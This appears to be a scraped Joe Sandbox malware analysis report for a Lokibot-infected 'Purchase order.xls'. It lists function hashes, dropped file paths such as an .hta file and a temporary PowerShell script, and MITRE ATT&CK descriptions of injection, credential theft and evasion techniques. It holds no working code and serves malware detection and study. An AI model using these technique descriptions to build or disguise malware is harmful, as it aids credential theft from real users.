Associated: 0000001A.00000002.666881308.000000000127A000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_1270000_aspnet_regbrowsers.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8756d1f4d055c0dc7aff075095dcbe292104c088d0133e29438e6fa3ee789895
Instruction ID: ea083b8401bd2fe80e0752b9ddca46f36897a54899967f98843c23b55d307a01
Opcode Fuzzy Hash: 8756d1f4d055c0dc7aff075095dcbe292104c088d0133e29438e6fa3ee789895
Instruction Fuzzy Hash: A362482108EBC14FC3078B709D756927FB5AE4322475E9ACBC4C1CF1A3D61A995AE372

Function 0040549C Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db4539c410e0fe4373e7c5db18565f275e95a05af4a94000d4ba81a11fef15ca
Instruction ID: 891bc98f6eee734ec0083ebf38281cede3cc23ab6c94fa2f23d2f5c2768c820d
Opcode Fuzzy Hash: db4539c410e0fe4373e7c5db18565f275e95a05af4a94000d4ba81a11fef15ca
Instruction Fuzzy Hash: D141F1B0614B205EE30C8F19C895676BFE2EF82341748C07EE8AE8F695C635D506EF58

Function 004029D4 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f39fa327c75608c0a161e98e355e11108031192147f1793d7a103cb0e814a40
Instruction ID: 8dc71014d8856f8ef2ad0e1c9cf09a1ab0c18a5277cabcb9e4e86e23f7506178
Opcode Fuzzy Hash: 5f39fa327c75608c0a161e98e355e11108031192147f1793d7a103cb0e814a40
Instruction Fuzzy Hash: 4B21BE76AB0A9317DB618D38C8C83B263D0EF99700F980634CF40D37C6D678EA21DA84

Function 0040317B Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Purchase order.xls

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Lokibot

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\greatthingswithgoodnewsgivenbygodthingsgreat[1].hta

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\simplethingswithgreatthignsgivenmebestthings[1].tiff

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\simplethingswithgreatthignsgivenmebestthings[2].tiff

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\655DB7B3.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6D6EA618.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7F15ABE6.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\90038BFA.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\92B84E9D.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D35A1E0C.emf

C:\Users\user\AppData\Local\Temp\1f4gqch3.yb0.ps1

Windows Analysis Report
Purchase order.xls

Description:	Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.
Tactics:	Collection
Data Sources:	Logon Session: Logon Session Creation, Process: Process Access, Process: Process Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre